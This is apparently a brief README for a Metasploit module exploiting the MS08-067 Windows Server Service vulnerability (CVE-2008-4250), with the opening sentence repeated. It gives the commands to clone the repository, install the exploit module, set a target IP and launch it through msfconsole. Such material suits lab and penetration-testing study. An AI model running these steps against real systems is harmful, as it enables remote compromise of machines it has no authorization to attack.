
This repository contains a Metasploit module implementation for the MS08-067 Windows Server Service vulnerability (CVE-2008-4250). This is a classic remote code execution vulnerability affecting older Windows systems.
This repository contains a Metasploit module implementation for the MS08-067 Windows Server Service vulnerability (CVE-2008-4250). This is a classic remote code execution vulnerability affecting older Windows systems.
First, login Kali Linux. And 👉 Run the following command:
git clone https://github.com/BinRacer/ms08-067.git
cd ms08-067
sudo cp -a src/ms08_067_netapi_sp1.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
# must replace rc file x.x.x.x to real ip
sudo msfconsole -r src/ms08_067.rc
For complete legal information and disclaimers, please refer to the Disclaimer document.